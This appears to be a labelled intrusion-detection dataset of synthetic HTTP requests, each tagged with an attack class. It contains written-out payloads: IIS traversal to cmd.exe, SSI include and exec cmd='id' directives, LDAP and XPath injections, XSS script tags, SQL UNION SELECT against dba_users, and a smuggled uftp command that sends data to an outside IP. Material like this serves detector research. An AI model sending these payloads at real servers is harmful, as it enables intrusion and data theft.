GET /IISADMPWD/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 156.78.16.50
Connection: close
Accept: */*;q=0.7
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-cache
Client-ip: 242.53.53.65
Cookie: vAooiI=jTu6o;tzzictTnaE8tlaf=nYWA;vfilspe5soar=eeaenippipa2itezl
Cookie2: $Version="1"
Date: Sat, 09 Jul 05 19:22:57 GMT
ETag: "nd9_u0ZbZtMLDe87"
Expect: wspr4ebT
From: Roarg8@ntrfj.uk
If-Modified-Since: Fri, 03 Jun 05 08:30:18 GMT
If-Unmodified-Since: Mon, 06 Sep 04 24:08:26 GMT
If-Match: "Ja0D2jKowACW9diY2"
If-None-Match: "1uuUSlNtTmympqYd"
If-Range: *
Max-Forwards: 850
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Digest cnonce="l7ii"
Authorization: Basic ZGhyb0Flb2g6ZWVobGExcw==
Range: -541349,6-1
Referer: http://www.htKnca27.it/ee20/ipCIeCc/maem/tdrHseu.png
TE: deflate,deflate,chunked;q=0.8
Trailer: Transfer-Encoding
User-Agent: Mozilla/5.3 (compatible; MSIE 1.1; Win 9x; 8qoR)
UA-CPU: Sparc
UA-Disp: 624,195,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 757x0361
Via: 7.6 www.jm2hErsu.jpg, HTTP/4.2 www.aged.png, 9.9 www.saos.css
Transfer-Encoding: identity
Upgrade: o9h5r/6.8, 6Ah/8.0, nazl/9.6, 2Odwz/0.1, cfaEl/6.1
Warning: 817 www.ntpiq.tiff "GhTia" "Thu, 28 Jan 10 03:22:21 UTC"
X-Forwarded-For: 247.183.255.17
X-Serial-Number: 026026261334603
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 43763
Start - Id: 39787
class: SSI
GET /ioKbg/d3aOnIN6r/seAhtetsna0/Tyiotaeranxetqs4Lh3e/stdin@/qLdocument.jpg?1aRm0rsc=Ety&TeoseerieRt=14525&e1=hq&eupnr=tlxfq4glwD&artaeAitt=%3C%21--+++++%23include+virtual%3D%22%2Fvar%2Flog%2Fhttpd%2Faccess.log%22++--%3E HTTP/1.1
Host: 114.23.75.15
Connection: close
Accept: */*
Accept-Charset: iso-8859-3;q=0.8, windows-1257;q=0.8, iso-8859-5, us-ascii;q=0.5, hz-gb-2312;q=0.3
Accept-Encoding: *;q=0.9
Accept-Language: horA-6;q=0.0
Cache-Control: max-stale=8286
Client-ip: 251.84.251.102
Cookie: me=hnhitaaaselect;heneiia7tatbial=ns@YYrNu;nr=4404926;xik=o2GvR0c3pPxH;sznrreiahho=0dlEr
Cookie2: $Version="9"
Date: Sat, 08 May 04 19:23:52 CET
ETag: W/"Ne7FULYkvbu.-BWNg_8"
Expect: ailel=ewuid;sddttdad
If-Modified-Since: Thu, 11 Jan 07 12:25:57 CET
If-Unmodified-Since: Tue, 29 Jul 08 16:37:07 GMT
If-Match: "bHJKkxda8xbD6vUFfSP"
If-None-Match: *
Max-Forwards: 872
MIME-Version: 0.5
Pragma: nhasei='D'
Proxy-Authorization: Digest username="usl1mwH3"
Authorization: NTLM b1JSc0VobndhOTllZW1JenR2a2xzZG5lb2RGNXBYN25xcGk4aHllNA==
Range: 538-81062,0-593619
Referer: /pe1bwnnu/slDatt/Aiwc/1Ikai6d/njnoste.txt
Trailer: Upgrade
User-Agent: htryhear8/7.5
UA-CPU: Sparc
UA-Pixels: 181x202
Via: FTP/5.9 www.snhelRO2.css, 6.3 www.amdrli.shtml, HTTP/3.4 105.227.173.161
Transfer-Encoding: deflate
Upgrade: oLt/5.9, tEgb/6.9, 6laet/2.7, faare2/0.4, vst20/6.5
X-Serial-Number: 39977076241136
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39787
Start - Id: 36875
class: LdapInjection
GET /hDIIxDSkcp3Wb/gtofosre/Cfe0knhIsaItrd/eednsfiaYeNuti/hm-0o4m8AsRg4B9fUMlE.htm?8jd=a1ce&d1ieseAdsr=usetaenlepdeetAhd&6lmhdr=4&e4ziiu=72343032&fix4ljniaho=lp0JYS&bel0se=43047855&OYN8T=tl9cdDnpeac4Ki&syncdsdht=oSdlueEll3hy4on&ttCoeEt=i+es&6GkPselect=anghmrn9t7tdehyl HTTP/1.1
Host: 6.186.38.191
Connection: close
Accept: video/mpeg;q=0.3, image/*, video/*
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.2
Accept-Language: in9toaI-se;q=0.0, msntp-e;q=0.6, l61Lss-Ne
Cache-Control: no-store
Cookie: m0Z@=759161;e6=77;5ocnsAisg=bfmbsuiiinfleln;zU0Zmpw=jubeteeto8gfetign;Toji=8081)(&(objectClass=dtaa)(|(sn =  acon)(cn=orbv J*))
Cookie2: $Version="365"
Date: Wed, 03 Aug 05 07:31:47 CET
ETag: W/"s8Nb0rzEAJAH4vwUx0t"
Expect: 100-continue
From: vht9pbe@mea1nsCx.uk
If-Modified-Since: Mon, 13 Jun 05 15:52:28 UTC
If-Unmodified-Since: Tue, 10 Jun 08 10:48:44 GMT
If-Match: "k@F72w2GsN3YUvH-"
If-None-Match: "X0rII.1bLPpvOe1Mh@Ua"
If-Range: *
Max-Forwards: 3
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: Basic c044aG5NOnNlZXQ=
Authorization: c5yoth pNset=A6oea
Range: 02-
Referer: /sdet/DatrHto/atkhf.rar
TE: trailers,trailers,gzip
Trailer: If-Match
User-Agent: Mozilla/4.5 (Windows; U; Windows NT 3.0; e9-jt; rv:6.0.6) Gecko/60716874
UA-CPU: x86
UA-Disp: 6456,9144,32
UA-Color: color16
Via: FTP/3.9 145.96.245.42, 5.7 www.rrlni.css:04, FTP/9.0 www.oeaea.png
Transfer-Encoding: identity
Upgrade: ohn/4.2
Warning: 209 www.aonodt.shtml "esni6no" "Wed, 09 Jan 08 18:24:08 UTC"
X-Forwarded-For: 189.131.236.160
X-Serial-Number: 29239310309517844087
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36875
Start - Id: 47072
class: XSS
GET /eiyeze5xp41tn3aeCNEs/8Cpasswdj/abhwyAxU.Va1hbCS/8usr/lt0rdt0tseai/rtascmu9s4OarrSl/tB5wu-PVr1/aihif/o2/ora5MgemeOsycineahoL/a2ByFYJOv8Dm77pX/nr1r4tsioefh9d.jpeg?HKc2group bys=30&9kxy=zrbhtu&Atkie=mi5arlfnyeshhdeeo&b78bStde=s6ho&eeai=os%5Chttps+1mew%28orxtermamcAqs&as0eu0eatd=dm3e&oiTfamEA=%3Cimg%2Bsrc%3Djavascript%3A+alert++%28%27HgdP.en%27%29+++%3E HTTP/1.1
Host: www.mwoaiD.ch
Connection: close
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 217.116.65.138
Cookie: ec=62009654;Fs_96u5_6p=08connectqtt: servicesncHeeisoiformt;ahsed1cnnts=vgn0ezteeeahgois/betweenh;DLd2HK=ncneba;ivEmznJmi=629886
Cookie2: $Version="13"
Date: Mon, 19 Jan 09 22:50:06 GMT
ETag: W/"sdelRvzyys61VAh"
Expect: yshaae=hl6e2eC
From: l5ga@0acwrnnsyp.biz
If-Modified-Since: Tue, 26 Dec 06 20:39:15 UTC
If-Unmodified-Since: Tue, 12 Feb 08 14:22:48 CET
If-Match: "s3IjE_BSN5P4UBme"
If-None-Match: *
If-Range: *
Max-Forwards: 6
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM c2FlbG44ZUUydWF0bmNhUmVvYWViZXB1bGFhZW1zYWVldnBEcmNVamU=
Range: 44535-
Referer: /Faedd7f.asmx
TE: trailers,gzip;q=0.4,deflate;q=0.1
Trailer: Via
User-Agent: erNlossif (aKFSgSXQ)
UA-CPU: MIPS
UA-Disp: 016,6175,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 987x1282
Via: HTTP/2.6 83.10.245.89, deeh/2.0 www.65ii.gif
Transfer-Encoding: t7ohn; ms1auo=olsir
Upgrade: cei/0.7
Warning: 844 63.32.200.155 "u8ouwTturkm44sneT7" "Tue, 11 Apr 06 02:02:13 GMT"
X-Forwarded-For: 240.93.48.210
X-Serial-Number: 6641279926067
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47072
Start - Id: 42670
class: SqlInjection
GET /udo3N13wfQ@/syioto/cphn/9JMoaiWBS2/-RPZmyQ6EIc/96HShtaccesymz_AOnN/efV6olotwnhoqtucbqO/pW9/xF./to2@r/ejtukRNQhX5rY.pwOr.php3?obselepdQIw=75dehf&738rmkwx3rsZ=chairs%27+++++UN%2F**%2FION+++++SEL%2F**%2FECT+++mnG0roja+FROM++++dba_users+WHERE+++aih++++like++%27%2525&lo=ini&@Vg4rmaimgqGj=c+o&5tol=Hcma HTTP/1.0
Host: 191.124.100.171
Connection: keep-alive
Accept: text/html;q=0.3
Accept-Charset: iso-8859-8-i, x-mac-arabic
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.2
Cache-Control: no-transform
Client-ip: 179.202.66.201
Cookie: set1lo9iesqe2s=9005384813;yaEAegezlso=77957480;dtcmetaa=wonwmwma9non;in=ttTE;Vl1Fte=h<uf
Cookie2: $Version="1"
Date: Thu, 29 Nov 07 10:05:49 CET
ETag: W/"uROPmH-wt_Abq65K3"
Expect: fR38ypsO
If-Modified-Since: Fri, 11 Apr 08 04:19:16 GMT
If-Unmodified-Since: Fri, 23 Feb 07 15:18:07 UTC
If-Match: "jULdndvovV6X@mq"
If-None-Match: "mgM3YBhDL8pYO.wlO"
If-Range: "smnc27za56MrM8nmBam"
Max-Forwards: 2
MIME-Version: 1.1
Pragma: hf='mtnut'
Proxy-Authorization: Basic eWFlckVMOnI3NHRu
Authorization: Digest uri=http://azuaI9e.uk/ietnnrf/heam/pansraeb/pqtue.exe
Range: 73002-0
Referer: http://ald9sita.biz/gYens.tiff
TE: trailers,gzip,chunked;q=0.7
Trailer: Accept
User-Agent: Mozilla/5.6 (X11; U; Open BSD i386 7.7; ai-nt; rv:1.8.2) Gecko/53637776
UA-CPU: PowerPC
UA-Disp: 000,128,8
UA-OS: Windows 98
UA-Color: color32
Via: HTTP/7.4 www.Nc5uulo.js
Transfer-Encoding: compress
Upgrade: eeog/2.4, mitts/3.0, e6e3i/4.3, oaelt/5.7, heNtCn/4.2
Warning: 783 www.chvaonf.html "Tvnj8wlTdlch3nhl" "Mon, 08 Mar 04 04:17:40 CET"
X-Forwarded-For: 113.84.223.129
X-Serial-Number: 328822
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42670
Start - Id: 43009
class: OsCommanding
PUT /lW27C4awt/rc/j8aq.bin? HTTP/1.0
Content-Length: 128
Content-Language: tfs,8ia,sah3N
Content-Encoding: compress
Content-Location: http://www.bikso.gov/mKFt/um1eteTE/oopyhn/ccipgnmy.tar
Content-MD5: dHJtZWhTaGhkcjg3YTd1ag==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 25 Jun 06 17:13:25 GMT
Last-Modified: Fri, 29 Apr 05 05:10:09 UTC
Host: www.snE2wc.be
Connection: lXinItnd
Accept: text/plain;q=0.1, video/*, audio/*;q=0.0
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: q6s-1amz, 3-p
Cache-Control: no-store
Client-ip: 236.0.182.54
Cookie: I2P.aT3=0135233;me=ltlRiv
Cookie2: $Version="63"
Date: Sun, 23 Jan 05 02:12:53 CET
ETag: "X6SSI8tAMpm@96bN5OZe"
Expect: 100-continue
From: odyrata@nanebCh8fa.gov
If-Modified-Since: Wed, 13 Apr 05 06:46:23 CET
If-Unmodified-Since: Mon, 29 Aug 05 21:03:53 GMT
If-Match: "qGZo@jMcMeCGnSlW0Kx"
If-None-Match: "Wf4.Gz8ZK0uCQmV"
If-Range: "gI5FGGrGt_9N7wjZ"
Max-Forwards: 726
Pragma: jettofMh=ne
Authorization: Digest realm
Referer: http://www.nIrrtevd.com/nzdefo/aewbnp/rh0dK/bidserd/SiprLeEn.aspx
TE: trailers,gzip;q=0.8,trailers
Trailer: Pragma
User-Agent: Mozilla/0.3 (Machintosh; U; PPC Mac OS X 1.7; ra-e1; rv:1.8.0) Gecko/87331555
UA-Pixels: 2695x320
Via: 1.6 148.148.60.141, FTP/0.2 www.tgTi.js
Transfer-Encoding: 1dynle; ehrnen=xcniebg
Upgrade: ynp/2.4
Warning: 863 www.t8fst5.js:4942 "iaa8uceowT1aeejsueoy" "Mon, 03 Nov 08 04:48:51 UTC"
X-Forwarded-For: 225.212.15.105
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

dif='   ;uftp -g   /home/esil/chalrengil     163.97.153.221  /genach    ;&nmoTrse=43723915&sbeimwilo0ja8=aXvHoJ6x0

End - Id: 43009
Start - Id: 37114
class: LdapInjection
GET /L0C.bIA9unionfrom/oncOPkmPYm4M/ed2ubHkPUqospdOsA0A/0irowsESnupnnhermr/iI0h6-E.vOw.jpeg?omaxhgemdk1=uphpaV+nCdivc3nomy%5D%3Dio5L&yem=37%29%28%26%28objectClass%3DmfOt%29%28%7C%28sn++%3D+++o9as%29%28cn%3Dh++J*%29%29 HTTP/1.1
Host: 18.192.215.123:80
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-ce
Accept-Encoding: *
Accept-Language: tfy-te
Cache-Control: max-stale
Client-ip: 82.149.38.78
Cookie: Ya8ilnt9izeveta=ex-deT1;heT=2709;oiio8soeianEnw=oa&8ao
Cookie2: $Version="656"
Date: Mon, 21 May 07 21:48:13 CET
ETag: W/"1hm2z.hSMJ2UX6BV@"
Expect: 100-continue
From: ke6iat@otEmem.org
If-Modified-Since: Mon, 22 Oct 07 04:21:29 GMT
If-Unmodified-Since: Sat, 09 Sep 06 05:44:22 UTC
If-Match: "nfYHp9hhfpwpGjAUoDG"
If-None-Match: "YaYrghb5gmtE5xvyi@P"
If-Range: "hSj..vl.bW0DN9X1qDQ8"
Max-Forwards: 1874
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: Basic ZWVKbmI6ZGk1OHI=
Authorization: Digest cnonce="cvdipt"
Range: -12929,-403
Referer: http://5iet.uk/ez7i/iurha.nsf
TE: trailers,gzip;q=0.2
Trailer: Accept-Language
User-Agent: Mozilla/4.1 (compatible; Konqueror/9.8; Win98; evtsoofuhs; klh1)
UA-CPU: 68000
UA-Disp: 529,581,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 617x3755
Via: e5szau/6.4 18.20.166.38, 2.7 59.35.105.170:87, FTP/5.3 www.tperrQln.jpeg:10500
Transfer-Encoding: compress
Upgrade: rPog/6.3, anziha/1.6, Aaolrp/4.1, ige/4.9, mu8/9.9
Warning: 296 92.253.127.230:14 "0shhdnca" "Sun, 22 Feb 04 22:26:45 CET"
X-Forwarded-For: 67.99.234.48
X-Serial-Number: 4738976742686812
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37114
Start - Id: 39913
class: SSI
PUT /eivarasoaiEt/rJNo@Ls07q83jWIjqmYF/mE@mLajjas/esteubar3rtf/oyheietss6rctRrnA.jpg? HTTP/1.0
Content-Length: 222
Content-Language: sn1oqzeP,e
Content-Encoding: compress
Content-Location: http://rsamde.it/ndmouIi/iii8/cesrIr0a/scal/iuvde.php3
Content-MD5: ZWhsaW93bEVxZ3ZhU25pbw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 18 Jan 08 15:13:36 UTC
Last-Modified: Sun, 22 Jun 08 10:40:22 UTC
Host: www.dbnhperSst.net:80
Connection: close
Accept: */*;q=0.8
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: M-0ehl, H-t;q=0.0, 8-aivloTo, x-naaz;q=0.9
Cache-Control: nbtvr='Ee'
Client-ip: 239.36.31.16
Cookie: b1p=bo
Cookie2: $Version="524"
Date: Fri, 09 Dec 05 03:40:49 UTC
ETag: W/"KujfBaJYEnNh-svZHP"
Expect: 100-continue
From: etiwhOvt@03yWr.net
If-Modified-Since: Fri, 07 May 04 13:17:19 UTC
If-Unmodified-Since: Mon, 04 Jul 05 10:24:39 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2
MIME-Version: 3.1
Pragma: aed5=ead
Proxy-Authorization: Digest response="dD0B7d539F14ACC6a145A7c016DF9930"
Authorization: Basic ZGhBaGFpYW46RXVzb0FvZmc=
Referer: http://www.teNarb1.it/of5te/2cHctatn/Niav7ub/oouor/rfe6so.cgi
TE: trailers,chunked;q=0.2
Trailer: Trailer
User-Agent: Mozilla/4.8 (compatible; Konqueror/6.9; Linux i386; oith0o3at)
UA-CPU: StrongARM
UA-OS: Win9x
UA-Color: color16
Via: HTTP/5.8 161.47.96.155
Transfer-Encoding: deflate
Warning: 151 www.ttt8oAn.jpg "coIndbni" 
X-Forwarded-For: 54.46.237.13
X-Serial-Number: 2450299915461461
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

TsY4Nqtat=2oe|n edic]os&soseisnfosflitT=asBe%d1&fdiadhg=<!  #<!--   #exec     cmd="id"-->&eerm=tnse&euhseiRe=mndivwacceptviydsF&hhtbwdymimd=nGKc&CWm0BhttpsJ.G5= &oetqzbtgms9=n3yrineesa(aT3opge4y

End - Id: 39913
Start - Id: 47668
class: XSS
GET /yVF/l-aHX7vmC3g/e9lue8hreooo2hlserh/aveele/trsu9abEiayeri0to/a2iXQePdTtcC59wdGpGI/fshrle3pyAttor7seogA/jZcfE484WNZR0/dzexecrO.Yzg/rySL16M.mspx?txhtonnee1tclUr=e+tuio3shtpasse&e3nclb2teTct=5945&6iet=%3Don&NIdhs-9az=%3Cscript%3Ealert+++%28Whdrrkk.idpaP%29%3C%2Fscript+%3E&yLnowaqNdrn4=01643&sagrdbu=8 HTTP/1.1
Host: www.3oRldoell.com
Connection: close
Accept: video/mpeg, audio/*;q=0.9
Accept-Charset: *;q=0.7
Accept-Encoding: gzip;q=0.0, gzip;q=0.6
Accept-Language: *
Cache-Control: muo=eeL
Client-ip: 39.154.184.38
Cookie: obf=tlRwatt1ag;ziteA=1196;Ia=59565;xcrt9v=cy;eg9cc=35792
Cookie2: $Version="8"
Date: Mon, 08 Aug 05 23:35:18 GMT
ETag: W/"T6GZychf4Xyzvl1pm"
Expect: 100-continue
From: tdjaSrwt@arqsc.uk
If-Modified-Since: Thu, 18 Jun 09 09:27:34 CET
If-Unmodified-Since: Sat, 24 Sep 05 03:14:20 UTC
If-Match: "i4QRCYzzyN2UmI5luK8"
If-None-Match: "VbtpaeCIuwNOtSzX"
If-Range: "l_ORPJKEZn2GZH8S"
Max-Forwards: 2291
MIME-Version: 7.4
Pragma: co=ibi
Proxy-Authorization: Digest algorithm=MD5
Authorization: Basic YzZrbmRnOmJlczQ=
Range: -017,-1,-32
Referer: /0Aeld/rpr7rzix/nqqd.asmx
TE: trailers,chunked
Trailer: From
User-Agent: sp2DciC http://www.eezctrk1.net
UA-CPU: 68000
UA-Disp: 2630,1668,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 694x5281
Via: zoes/3.0 235.135.82.75
Transfer-Encoding: compress
Upgrade: OceeiE/8.8, btin/1.3, wrUw/4.8, toehd/0.2, t0m4l/5.1
Warning: 036 www.sm7aE.jpeg "OA9la" "Thu, 19 Nov 09 13:07:50 GMT"
X-Forwarded-For: 118.255.6.210
X-Serial-Number: 6943669939
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 47668
Start - Id: 38702
class: LdapInjection
GET /ecoNEetswdasr1heiew/tYr.3N/wpPVH0y8-WMnzGWvn/ez5/wSe42V60V/insertAVspqolike/eC@a9X7/orzU@6yAnge3/2gL/foUJAjboF/ObXD.shtml?Rnxn=46%29%28%26%28objectClass%3Dteys%29%28%7C%28sn+++%3De2%29%28cn%3Dshm++++J*%29%29&Eihhxuc=391&ercfwr8=replaceihtpass9eElsdrs6E%3Bkepsi&uesCqhl3hn=780295&5sYreplacewp-Sg-j=%5Be&s9dynt0=765722&leretzyaex=26&oora=l%402JfNE970q&enSndnor=0&d3mDelyJjH8saTz=lt6see4a&eisiletrhdyrg=a94PRAr3wz&ltetrpw=iuypXt&zOehades0=eqfet0enc8ftdt&Ga=3725872 HTTP/1.1
Host: www.layersA.de
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: uolcqy6s='darNzhI'
Client-ip: 244.26.7.222
Cookie: haosmgdjnun=2Sgeisdrr;sognue=4951583;yScllknitynhe=tirp8rxneeea3bva
Cookie2: $Version="63"
Date: Mon, 17 Oct 05 16:00:39 UTC
ETag: W/"PVcmfJxnkWU@I6@XHg8W"
Expect: eeech4=ooiABi8;smtcl=schIwdb
From: lLzaagE6@8ctXe4aie.gov
If-Modified-Since: Thu, 28 Jul 05 13:05:52 UTC
If-Unmodified-Since: Sun, 01 Feb 04 17:28:02 UTC
If-Match: "y0pGYppoWQogUHNO18"
If-None-Match: *
If-Range: Sat, 07 Apr 07 14:03:42 GMT
Max-Forwards: 253
MIME-Version: 5.4
Pragma: nathli='r'
Proxy-Authorization: NTLM eTlKZXRmcGlubWtvZUJlZGZzZ2VBcmhlZ2RlbmViOTM0ZWVnZmVudGloaHdlb2ZC
Authorization: NTLM dG5zUG5ycmlhdGl3ZW1scnR0Z3RoZXRyb2tqbGVEdGhhdHRlZTA3aVRyZXBFcjk=
Range: 557810-
Referer: http://www.rurkYhsv.st/j8en/azeawr.tar.gz
TE: deflate;q=0.3,trailers,trailers
Trailer: If-Modified-Since
User-Agent: a8h0nuurae (fdckEEFC; 1-XTv0@; lJu5ChGOrP; erU_F1; oI2NWQMccq)
UA-CPU: PowerPC
UA-Disp: 0550,3953,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 094x3377
Via: ist/9.3 29.88.88.160:85, 6.5 53.193.132.245
Transfer-Encoding: deflate
Upgrade: s1i4r/2.1, mrhpoe/7.3, dua/2.5, lrn/6.4
Warning: 442 77.207.105.249 "n0tcfehentkl" 
X-Forwarded-For: 249.144.3.114
X-Serial-Number: 7677444389981478018
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38702
Start - Id: 42584
class: SqlInjection
GET /bgsoundKUgM/leidrcuiuaRt1tef/3e.pl?I486J=%27+AND+++++USER_NAME%28%29%3D%271ex&ontoet=nbyysstiprtn&tbbtnens1ugnnin=9801&gandM4=263111&0n=66316&cvbm=nAap.w&ao=29123176&oitaoaoaiA=Ai&r3aefiltawE=irufaexp_uumsx9&ametmei0gi43=44495514&ispeeh=880497264 HTTP/1.1
Host: 104.251.66.108
Connection: close
Accept: application/x-tar;q=0.9
Accept-Charset: iso-10646-ucs-2;q=0.2, iso-8859-9;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: max-stale=9
Client-ip: 42.90.137.8
Cookie: 8yowoeecbsthm=tV9frie;eiebnaaiubdhu=5;stu2saeqaeko=9235
Cookie2: $Version="6"
Date: Sat, 09 Apr 05 10:28:59 CET
ETag: W/"ndcVEpE9UKtBcNm"
Expect: wshtlUla
From: tmTstilr@oerx.it
If-Modified-Since: Sun, 04 Apr 04 22:10:17 GMT
If-Unmodified-Since: Sun, 18 Apr 10 06:11:22 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 03 Feb 07 22:23:13 CET
Max-Forwards: 8457
MIME-Version: 1.0
Pragma: 02so3=o
Proxy-Authorization: ANmlte ugha=sktWs
Authorization: Digest realm
Range: -327,463619-533,09-501926
Referer: http://www.neyAab0.uk/edkna/naT0/srcnp3Tn/4ojrttr.mpeg
TE: trailers,trailers
Trailer: From
User-Agent: r1aHhuii (obUdrVvE; r.44ye9pQd)
UA-CPU: MIPS
UA-Disp: 8242,0192,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 4922x3138
Via: HTTP/0.3 www.5hrc.jpg, HTTP/9.8 130.173.125.146, 8.4 www.cwoefurv.tiff
Transfer-Encoding: lo1mar; 6euosnh=treEoof1
Upgrade: ilaa/5.9, idlc4/7.8, uer/9.3, ttwuf/4.1, veDF/9.2
Warning: 740 www.flc6.js "aobefTi4oh6lxaa" "Sat, 01 Jul 06 04:47:36 CET"
X-Forwarded-For: 149.227.177.29
X-Serial-Number: 7047593
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42584
Start - Id: 40645
class: SSI
GET /aobtoaoqnslz/tnYyenrtdurraxiaha/uEoOcUv/cFtvev0Xm/veELVJOhVen/9I.lPQvl.1X/af2YFLVDWd1MXOPrtIL/e_Pqdiy6WG/rdpeeouanaioeN/AlX4troRtNobyv/sKw/aSgehPo6dmaean.js?eiWodbc6zoC=TO%5C&2DNf7=lOe&et=%3C%21--++++%23include++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22+++++--%3E&scfnyfanionsn=mtbthoxam&tmpf_3SZDoptB=yil7rc&Tpnl=ltNam9tSHia&relwguptyhonqie=is9siosHeytusgwx1 HTTP/1.0
Host: www.aAubox.ch
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: compress;q=0.9, deflate, gzip;q=0.9
Accept-Language: *
Cache-Control: t1saits='Yftestn'
Client-ip: 26.207.222.161
Cookie: tIoAEagu3du3=ou4q;ck4n=206098;QgKV5-odropZC=tMUZZ;emjhcdeah4neqim=Wo6hcrnee;ra=onlosrbgsoundbetweenD0h;z1Rdico8enrmr=sa5y88PrNwu
Cookie2: $Version="931"
Date: Mon, 28 Jun 04 11:09:17 UTC
ETag: "0zRq79CN1KnGsgf7RN."
Expect: ooeos=S6heu
From: temre6@tneo.biz
If-Modified-Since: Thu, 11 May 06 22:07:16 GMT
If-Unmodified-Since: Mon, 05 Mar 07 13:25:11 UTC
If-Match: "3Do10uAnyZocxam4sC3F"
If-None-Match: "m-7fgxRSB.qeBczK9FB_"
If-Range: "0_vyhnPoV8LhtikmH"
Max-Forwards: 653
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: sfoht tsob=EeAAttxn
Authorization: NTLM b0hoMGVlOGd0ZXRhZTc3b25uc0M0Z2V2b2dvT3BvZXRoVGU=
Range: -9579,186989-7
Referer: /mt0T5s/ma3drcho/eroyye/upxour7.jsp
TE: gzip;q=0.3,trailers
Trailer: Transfer-Encoding
User-Agent: ytrm/4.1.1
UA-CPU: PowerPC
UA-Disp: 959,926,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 002x244
Via: FTP/7.1 164.60.33.169, 2.0 www.ee1h.png
Transfer-Encoding: gzip
Upgrade: eeyr/9.4
Warning: 643 www.anntntto.js "msA0earuygs" 
X-Forwarded-For: 197.32.78.234
X-Serial-Number: 258483037119432010
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40645
Start - Id: 35735
class: XPathInjection
GET /tntkBT4mr/adt/sjtnlrhsE6r/hYjPq2BvMp/Eahes9fisimatn/myF7rea8yEtarehee/n@xVCrt2nr8f2OAf/aKrFbdIMakTA/0Fzy9/gELC.php?moerId=nY6WC&ehrn51ltearhUa=9mint&rvitj=6705&aasta=aaMde&xSnzftp=achADud&zmiCxN69js=26210&yq=R%2Fr7om%2Fto%2Fchild%3A%3Anode%28%29%5B+++++position%28%29%3D263%5D++%7C++93hhoe%2Fmss%2Fatntt%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D6%5D+++or+++%27eLRtW%27++%3D++++%27&eKz=1uSTVY HTTP/1.0
Host: www.oEeireivf.be:80
Connection: chaert
Accept: video/*, audio/*;q=0.0
Accept-Charset: windows-1252, x-mac-cyrillic, iso-8859-1;q=0.1, x-mac-chinesetrad
Accept-Encoding: identity;q=0.7, deflate;q=0.8
Accept-Language: *;q=0.0
Cache-Control: min-fresh=93
Client-ip: 55.42.106.115
Cookie: zmAliwwf6rud=awesalinky0~ynoh;aitnRnt=yo;hteeu=40;5rh=cBu;rM_iS=fuvolve
Cookie2: $Version="4"
Date: Sun, 25 Dec 05 01:19:39 GMT
ETag: W/"-PRK3VV8os1f081zURL"
Expect: 100-continue
From: dkgpi@e0eolroeA.ch
If-Modified-Since: Wed, 24 Jan 07 14:49:37 CET
If-Unmodified-Since: Sun, 25 Jun 06 23:14:26 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 16 Feb 04 22:31:17 CET
Max-Forwards: 22
MIME-Version: 4.7
Pragma: unet='gry7dqfa'
Proxy-Authorization: Basic dHROVGlpMXQ6b29rdEZj
Authorization: Digest nonce
Range: 820401-
Referer: http://ijkuirt.de/aseen/tagicbr/htdsfp/5ete/ntaRtp.mspx
TE: gzip,trailers
Trailer: Trailer
User-Agent: Mozilla/9.7 (Windows; U; Windows NT 7.4; tr-e3; rv:2.8.3) Gecko/41971230
UA-CPU: x86
UA-Disp: 453,3007,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 161x6887
Via: FTP/7.5 55.50.151.27, hiAtn/7.8 www.etihU.jpg
Transfer-Encoding: deflate
Upgrade: ttidl/7.3, a5gzg/3.5, Gca/8.0
